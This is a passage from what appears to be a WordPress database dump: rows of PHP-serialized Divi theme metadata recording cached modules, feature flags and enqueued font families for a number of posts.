{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32992,2,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:4:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:3;s:10:\"et_pb_text\";}}'),(32993,2,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32994,2,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:20:\"block_layout_enabled\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:25:\"media_embedded_in_content\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32991,563,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32987,587,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32988,563,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32989,563,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32990,563,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32983,598,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32984,587,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32985,587,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32986,587,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32979,612,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32980,598,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32981,598,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32982,598,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32975,668,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32976,612,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32977,612,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32978,612,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32971,735,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32972,668,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32973,668,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32974,668,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32963,1685,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32964,830,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32965,830,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32966,830,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32967,830,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32968,735,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32969,735,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32970,735,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32960,841,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32961,1685,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32962,1685,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32958,841,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32959,841,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32954,863,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32955,863,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32956,863,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32957,841,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32951,868,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32952,868,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32953,863,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32947,876,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32948,876,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32949,868,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32950,868,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32944,932,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32945,876,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32946,876,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32937,531,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a